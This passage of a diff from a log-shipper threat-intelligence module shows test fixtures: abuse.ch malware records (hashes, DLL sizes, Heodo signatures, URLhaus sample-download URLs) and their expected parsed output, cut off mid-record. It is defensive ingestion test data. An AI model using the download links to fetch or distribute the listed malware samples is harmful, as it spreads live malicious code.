06:05:52","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/07a9d84c0b2c8cf1fd90ab409b9399d06920ab4b6efb647b5a3b9bef1045ee7e/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:WlLMUG2gFWLDFO9vNa11y3NPcJufFFTXNZrjJTKk:W5MT4WNaHy9P1FjbrjlKk","tlsh":"6B54CF217A53C826F5E800FCA6E9878914167F346F44A4C773D40F6AA8759E2EF2B317"} +{"md5_hash":"e48e3fa5e0f7b21c1ecf1efc81ff91e8","sha256_hash":"708c0193aec6354af6877f314d4b0e3864552bac77258bee9ee5bf886a116df5","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:05:51","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/708c0193aec6354af6877f314d4b0e3864552bac77258bee9ee5bf886a116df5/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGo:X5DpBw/KViMTB1MnEWk0115Jj","tlsh":"6644D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"8957f5347633ab4b10c2ae4fb92c8572","sha256_hash":"f70a3c016fe791eb30959961f0bcaa08ba7b738491b9ae61cb4a667cd1de8b37","file_type":"dll","file_size":"284672","signature":"Heodo","firstseen":"2021-01-14 06:05:50","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/f70a3c016fe791eb30959961f0bcaa08ba7b738491b9ae61cb4a667cd1de8b37/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJy:0h3eZgRQCcw+MN54dEq7kqRtoLZM","tlsh":"0754CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717"} +{"md5_hash":"09cc76b7077b4d5704e46e864575ff03","sha256_hash":"94ca186561b13fa9b1bf15f7e66118debc686b40d2a62a5cf4b3c6ca6ee1c7a1","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:05:36","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/94ca186561b13fa9b1bf15f7e66118debc686b40d2a62a5cf4b3c6ca6ee1c7a1/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG/:X5DpBw/KViMTB1MnEWk0115Js","tlsh":"BB44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"98a1cdf7de4232363f1d1e0f33dbfd99","sha256_hash":"909f890dbc5748845cf06d0fb0b73a5c0cb17761f37e9cd4810eea0d0eb8627f","file_type":"dll","file_size":"284672","signature":null,"firstseen":"2021-01-14 06:05:16","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/909f890dbc5748845cf06d0fb0b73a5c0cb17761f37e9cd4810eea0d0eb8627f/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJQ:0h3eZgRQCcw+MN54dEq7kqRtoLZ+","tlsh":"C554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717"} +{"md5_hash":"8a51830c1662513ba6bd44e2f7849547","sha256_hash":"d1fa76346bef5bc8adaa615e109894a7c30f0bef07ab6272409c4056ea8d52aa","file_type":"dll","file_size":"284672","signature":"Heodo","firstseen":"2021-01-14 06:05:15","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/d1fa76346bef5bc8adaa615e109894a7c30f0bef07ab6272409c4056ea8d52aa/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJh:0h3eZgRQCcw+MN54dEq7kqRtoLZ/","tlsh":"1654CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717"} +{"md5_hash":"ae21d742a8118d6b86674aa5370bd6a7","sha256_hash":"3b9698b6c18bcba15ee33378440dd3f42509730e6b1d2d5832c71a74b1920e51","file_type":"dll","file_size":"280064","signature":null,"firstseen":"2021-01-14 06:05:12","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/3b9698b6c18bcba15ee33378440dd3f42509730e6b1d2d5832c71a74b1920e51/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:WlLMUG2gFWLDFO9vNa11y3NPcJufFFTXNZrjJTKS:W5MT4WNaHy9P1FjbrjlKS","tlsh":"5454CF217A53C826F5E800FCA6E9878925167F346F44A4C373D40F6AA8759E2DF2B317"} +{"md5_hash":"78c9d88d24ed1d982a83216eed1590f6","sha256_hash":"d11edc90f0e879a175abc6e2ce5c94a263aa2a01cd3b6e8b9fdf93a51235ae99","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:04:38","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/d11edc90f0e879a175abc6e2ce5c94a263aa2a01cd3b6e8b9fdf93a51235ae99/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG8:X5DpBw/KViMTB1MnEWk0115Jr","tlsh":"6044D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"236577d5d83e2a8d08623a7a7f724188","sha256_hash":"8cd28fed7ebdcd79ea2509dca84f0a727ca28d4eaaed5a92cd10b1279ff16afa","file_type":"dll","file_size":"241664","signature":null,"firstseen":"2021-01-14 06:04:26","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/8cd28fed7ebdcd79ea2509dca84f0a727ca28d4eaaed5a92cd10b1279ff16afa/","virustotal":null,"imphash":"ed2860c18f5483e3b5388bad75169dc1","ssdeep":"6144:X1G3WVIOY6Bdjehj+qudd96ou/6mv5wdC:X1GmSafShjYdd96z/6cwdC","tlsh":"8D34BE41B28B8B4BD163163C2976D1F8953CFC909761CE693B64B22F0F739D0892E7A5"} +{"md5_hash":"ff60107d82dcda7e6726d214528758e7","sha256_hash":"fb25d13188a5d0913bbcf5aeff6c7e3208ad92a7d10ab6bed2735f4d43310a27","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:04:20","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/fb25d13188a5d0913bbcf5aeff6c7e3208ad92a7d10ab6bed2735f4d43310a27/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGz:X5DpBw/KViMTB1MnEWk0115JU","tlsh":"9244D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} diff --git a/x-pack/filebeat/module/threatintel/abusemalware/test/abusechmalware.ndjson.log-expected.json b/x-pack/filebeat/module/threatintel/abusemalware/test/abusechmalware.ndjson.log-expected.json new file mode 100644 index 000000000000..3a5116627250 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abusemalware/test/abusechmalware.ndjson.log-expected.json @@ -0,0 +1,735 @@ +[ + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/48a6aee18bcfe9058b35b1018832aef1c9efd8f50ac822f49abb484a5e2a4b1f/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "48a6aee18bcfe9058b35b1018832aef1c9efd8f50ac822f49abb484a5e2a4b1f", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG5:X5DpBw/KViMTB1MnEWk0115JW", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "48a6aee18bcfe9058b35b1018832aef1c9efd8f50ac822f49abb484a5e2a4b1f", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG5:X5DpBw/KViMTB1MnEWk0115JW", + "threatintel.indicator.file.hash.tlsh": "1344D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:14:05.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/ec59538e8de8525b1674b3b8fe0c180ac822145350bcce054ad3fc6b95b1b5a4/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 580, + "related.hash": [ + "ec59538e8de8525b1674b3b8fe0c180ac822145350bcce054ad3fc6b95b1b5a4", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGY:X5DpBw/KViMTB1MnEWk0115Jr", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "ec59538e8de8525b1674b3b8fe0c180ac822145350bcce054ad3fc6b95b1b5a4", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGY:X5DpBw/KViMTB1MnEWk0115Jr", + "threatintel.indicator.file.hash.tlsh": "4E44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:11:41.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 1160, + "related.hash": [ + "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGG:X5DpBw/KViMTB1MnEWk0115Jd", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.abusemalware.virustotal.link": "https://www.virustotal.com/gui/file/b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7/detection/f-b0e914d", + "threatintel.abusemalware.virustotal.percent": "37.88", + "threatintel.abusemalware.virustotal.result": "25 / 66", + "threatintel.indicator.file.hash.sha256": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGG:X5DpBw/KViMTB1MnEWk0115Jd", + "threatintel.indicator.file.hash.tlsh": "7544D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:11:22.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/7483e834a73fb6817769596fe4c0fa01d28639f52bbbdc2b8a56c36d466dd7f8/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 1904, + "related.hash": [ + "7483e834a73fb6817769596fe4c0fa01d28639f52bbbdc2b8a56c36d466dd7f8", + "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJ9:0h3eZgRQCcw+MN54dEq7kqRtoLZH", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "7483e834a73fb6817769596fe4c0fa01d28639f52bbbdc2b8a56c36d466dd7f8", + "threatintel.indicator.file.hash.ssdeep": "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJ9:0h3eZgRQCcw+MN54dEq7kqRtoLZH", + "threatintel.indicator.file.hash.tlsh": "5554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 284672, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:11:21.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/760e729426fb115b967a41e5a6f2f42d7a52a5cee74ed99065a6dc39bf89f59b/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 2493, + "related.hash": [ + "760e729426fb115b967a41e5a6f2f42d7a52a5cee74ed99065a6dc39bf89f59b", + "6:TE6ll8uXi0jIAv6BHvPuA7RKTmOQamsQMGvMQgTYbtsWsQ72hCqPZG/:TTll8uTo5uA7RKtQamsS0QJfsQ7mCR" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "760e729426fb115b967a41e5a6f2f42d7a52a5cee74ed99065a6dc39bf89f59b", + "threatintel.indicator.file.hash.ssdeep": "6:TE6ll8uXi0jIAv6BHvPuA7RKTmOQamsQMGvMQgTYbtsWsQ72hCqPZG/:TTll8uTo5uA7RKtQamsS0QJfsQ7mCR", + "threatintel.indicator.file.hash.tlsh": "3CE0C002AB26C036500D154C221655B3B871911503CA14E6A6824BEA765D4A3290D190", + "threatintel.indicator.file.size": 352, + "threatintel.indicator.file.type": "unknown", + "threatintel.indicator.first_seen": "2021-01-14T06:08:02.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 3054, + "related.hash": [ + "86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGI:X5DpBw/KViMTB1MnEWk0115JH", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.abusemalware.virustotal.link": "https://www.virustotal.com/gui/file/86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac/detection/f-86655c0", + "threatintel.abusemalware.virustotal.percent": "39.13", + "threatintel.abusemalware.virustotal.result": "27 / 69", + "threatintel.indicator.file.hash.sha256": "86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGI:X5DpBw/KViMTB1MnEWk0115JH", + "threatintel.indicator.file.hash.tlsh": "0D44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:08:02.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/e91c9e11d3ce4f55fabd7196279367482d2fabfa32df81e614b15fc53b4e26be/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 3798, + "related.hash": [ + "e91c9e11d3ce4f55fabd7196279367482d2fabfa32df81e614b15fc53b4e26be", + "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJ1:0h3eZgRQCcw+MN54dEq7kqRtoLZL", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "e91c9e11d3ce4f55fabd7196279367482d2fabfa32df81e614b15fc53b4e26be", + "threatintel.indicator.file.hash.ssdeep": "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJ1:0h3eZgRQCcw+MN54dEq7kqRtoLZL", + "threatintel.indicator.file.hash.tlsh": "2554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 284672, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:07:53.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/beedbbcacfc34b5edd8c68e3e4acf364992ebbcd989548e09e38fa03c5659bac/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 4387, + "related.hash": [ + "beedbbcacfc34b5edd8c68e3e4acf364992ebbcd989548e09e38fa03c5659bac", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG/:X5DpBw/KViMTB1MnEWk0115Jg", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "beedbbcacfc34b5edd8c68e3e4acf364992ebbcd989548e09e38fa03c5659bac", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG/:X5DpBw/KViMTB1MnEWk0115Jg", + "threatintel.indicator.file.hash.tlsh": "A044D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:07:41.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/7cba55da723c0e020267a02e6ffc83e03a83701757fc4ec65ea398618ad881cf/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 4967, + "related.hash": [ + "7cba55da723c0e020267a02e6ffc83e03a83701757fc4ec65ea398618ad881cf", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG4:X5DpBw/KViMTB1MnEWk0115Jv", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.abusemalware.signature": "Heodo", + "threatintel.indicator.file.hash.sha256": "7cba55da723c0e020267a02e6ffc83e03a83701757fc4ec65ea398618ad881cf", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG4:X5DpBw/KViMTB1MnEWk0115Jv", + "threatintel.indicator.file.hash.tlsh": "4544D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:07:31.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/426be5e085e6bbad8430223dc89d8d3ced497133f8d478fd00005bcbb73399d4/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 5550, + "related.hash": [ + "426be5e085e6bbad8430223dc89d8d3ced497133f8d478fd00005bcbb73399d4", + "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJw:0h3eZgRQCcw+MN54dEq7kqRtoLZW", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "426be5e085e6bbad8430223dc89d8d3ced497133f8d478fd00005bcbb73399d4", + "threatintel.indicator.file.hash.ssdeep": "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJw:0h3eZgRQCcw+MN54dEq7kqRtoLZW", + "threatintel.indicator.file.hash.tlsh": "9454CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 284672, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:07:07.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/25093afdaeb3ea000743ab843360a6b64f58c0a1ab950072ba6528056735deb9/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 6139, + "related.hash": [ + "25093afdaeb3ea000743ab843360a6b64f58c0a1ab950072ba6528056735deb9", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGe:X5DpBw/KViMTB1MnEWk0115JR", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "25093afdaeb3ea000743ab843360a6b64f58c0a1ab950072ba6528056735deb9", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGe:X5DpBw/KViMTB1MnEWk0115JR", + "threatintel.indicator.file.hash.tlsh": "F344D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:07:07.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/b3327a96280365e441057f490df6261c9a2400fd63719eb9a7a0c9db95beecc5/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 6719, + "related.hash": [ + "b3327a96280365e441057f490df6261c9a2400fd63719eb9a7a0c9db95beecc5", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGc:X5DpBw/KViMTB1MnEWk0115J7", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "b3327a96280365e441057f490df6261c9a2400fd63719eb9a7a0c9db95beecc5", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGc:X5DpBw/KViMTB1MnEWk0115J7", + "threatintel.indicator.file.hash.tlsh": "F644D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:07:06.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/e92b54904391c171238863b584355197ba4508f73320a8e89afbb5425fc2dc4b/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 7299, + "related.hash": [ + "e92b54904391c171238863b584355197ba4508f73320a8e89afbb5425fc2dc4b", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGc:X5DpBw/KViMTB1MnEWk0115JP", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "e92b54904391c171238863b584355197ba4508f73320a8e89afbb5425fc2dc4b", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGc:X5DpBw/KViMTB1MnEWk0115JP", + "threatintel.indicator.file.hash.tlsh": "BE44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:07:00.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/dd15e74b3cd3a4fdb5f47adefd6f90e27d5a20e01316cc791711f6dce7c0f52e/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 7879, + "related.hash": [ + "dd15e74b3cd3a4fdb5f47adefd6f90e27d5a20e01316cc791711f6dce7c0f52e", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGf:X5DpBw/KViMTB1MnEWk0115Jo", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "dd15e74b3cd3a4fdb5f47adefd6f90e27d5a20e01316cc791711f6dce7c0f52e", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGf:X5DpBw/KViMTB1MnEWk0115Jo", + "threatintel.indicator.file.hash.tlsh": "CC44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:06:36.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/0fae1eeabc4f5e07bd16f7851aec5ab6032d407c7ff0270f2b6e85c2a3efebd1/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 8459, + "related.hash": [ + "0fae1eeabc4f5e07bd16f7851aec5ab6032d407c7ff0270f2b6e85c2a3efebd1", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGD:X5DpBw/KViMTB1MnEWk0115JY", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.abusemalware.signature": "Heodo", + "threatintel.indicator.file.hash.sha256": "0fae1eeabc4f5e07bd16f7851aec5ab6032d407c7ff0270f2b6e85c2a3efebd1", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGD:X5DpBw/KViMTB1MnEWk0115JY", + "threatintel.indicator.file.hash.tlsh": "8C44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": 